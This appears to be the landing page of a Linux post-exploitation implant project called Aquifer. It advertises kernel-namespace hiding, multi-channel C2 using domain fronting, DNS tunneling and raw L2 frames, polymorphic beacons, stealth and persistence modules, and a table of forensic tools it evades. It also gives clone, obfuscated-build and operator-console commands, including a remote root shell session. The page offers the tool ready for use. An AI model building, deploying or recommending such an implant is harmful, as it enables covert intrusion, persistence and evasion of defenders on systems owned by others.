Post-exploitation with namespace isolation

Kernel namespace isolation turns the OS against its own defenses. Multi-channel C2 with polymorphic beacons. 36 stealth modules for deep host-level blending.

Download Latest View Source

aquifer

# Build and deploy
$ make build-release
garble -literals -tiny -seed=random build ...
UPX compressed: 8.2MB → 3.1MB
PASS: No Go module paths found
PASS: High binary entropy (7.98)

# C2 operator console
$ python3 -m c2server --db c2.db --keys server_keys.pem
aquifer> sessions
ID  Hostname    Transport  Last Seen
1   target-01   HTTPS      2s ago

FEATURES

Kernel-level stealth operations

Namespace isolation as the foundation. Every capability designed for deep host-level blending and operational security.

Namespace Isolation

PID + Mount + Network + UTS + Cgroup namespaces with veth pair routing, NAT masquerade, and DNAT loopback for host connectivity. The implant operates in its own kernel-enforced sandbox invisible to the host.

# Two-stage execution
$ parent: guardrails → evasion → OPSEC → namespace setup
$ child: re-exec into PID+Mount+Net+UTS+Cgroup isolation

Stealth Modules

C2 Transport

Four independent channels with automatic failover. HTTPS with domain fronting and JA3 randomization. DNS tunneling via TXT records. DNS-over-HTTPS. Raw Layer 2 Ethernet frames below netfilter/iptables.

HTTPS → DNS → DoH → Raw L2 (cascading fallback)
JA3 randomization · domain fronting · traffic shaping
polymorphic beacons · ECDH + AES-256-GCM

Polymorphic Beacons

18 rotating paths, 8 content-types, 13 user-agents, randomized headers per cycle. JA3 fingerprint randomization per session. Traffic shaping mimics legitimate browsing.

Stealth Modules

eBPF cloaking, fileless execution via memfd_create, kernel keyring secrets, anti-dump regions, io_uring covert I/O, process masquerade, cgroup camouflage, and more.

Persistence

Systemd generators, NSS modules, logrotate hooks, DHCP client hooks, APT hooks, audit dispatcher, binfmt_misc, modprobe hooks, NM dispatcher, and sysctl.d tunables.

Guardrails

Hostname, CIDR, MAC, machine ID, canary file, and kill date prevent lab escape. Auto-terminates and cleans up outside target environment.

OPSEC

Memory encryption with XOR rekeying. Core dump prevention. Anti-ptrace. Environment scrubbing. Thread count reduction. I/O noise injection. Binary self-deletion.

CAPABILITIES

Stealth capabilities

36 modules for deep host-level blending. Every aspect of the implant footprint is managed.

PID Namespace

Mount Namespace

Network Namespace

UTS Namespace

Cgroup Namespace

eBPF Cloaking

Fileless Exec

Kernel Keyring

Anti-Dump

io_uring I/O

Process Masquerade

JA3 Randomization

Domain Fronting

Traffic Shaping

Polymorphic Beacons

ECDH + AES-GCM

Cgroup Camouflage

D-Bus Blending

Seccomp Awareness

Landlock Sandbox

                ● Full  
                ● Kernel 5.10+  
                ● Planned
            

ARCHITECTURE

Four-layer design

Two-stage execution with compile-time configuration. Parent validates, child operates inside isolated namespaces.

Namespace Engine

PID + Mount + Network + UTS + Cgroup isolation. Veth pair routing with NAT masquerade and DNAT loopback. Host-side cleanup on exit via parent signal handler.

C2 Transport

Four channels with automatic failover: HTTPS (domain fronting, JA3), DNS (TXT records), DoH, Raw L2 (AF_PACKET). ECDH key exchange + AES-256-GCM.

Module Framework

36 stealth modules in pkg/stealth/. eBPF cloaking, fileless execution, kernel keyring, io_uring, anti-dump, process genealogy, cgroup camouflage.

Persistence Layer

10 advanced methods beyond cron/systemd. Systemd generators, NSS modules, logrotate, DHCP, APT, audit, binfmt_misc, modprobe, NM dispatcher, sysctl.d.

GETTING STARTED

Build and deploy

Multiple build profiles. Production builds include garble obfuscation, UPX compression, and signature patching.

build.sh

$ git clone https://github.com/Real-Fruit-Snacks/Aquifer.git
$ cd Aquifer

# Development build (stripped, static)
$ make build

# Obfuscated build
$ make build-garble

# Production release
$ make build-release
garble + UPX + signature patching

c2server.sh

# Start C2 operator console
$ pip install -r c2server/requirements.txt
$ python3 -m c2server --db c2.db --keys server_keys.pem

# Interact with implant
aquifer> sessions
ID  Hostname    Transport  Last Seen
1   target-01   HTTPS      2s ago

aquifer[1]> shell whoami
root

DETECTION AWARENESS

Know the boundaries

Hidden From

ps aux, top, htop — process masquerade
/proc/PID/environ — direct memory zeroing
/proc/PID/maps — region name spoofing
LiME, AVML — anti-dump memory protection
lsof — FD spoofing via bind mounts
Syscall monitors — io_uring bypass
Network forensics — polymorphic + encrypted traffic
Container detection — namespace + ID spoofing

Visible To

Kernel integrity monitoring (IMA/EVM)
Hardware security modules (TPM attestation)
Custom eBPF tracing targeting specific patterns
Network metadata analysis (connection timing)
Hypervisor-level inspection (VM introspection)
SELinux/AppArmor in strict enforce mode
Physical memory acquisition (cold boot)
Kernel-level rootkit detectors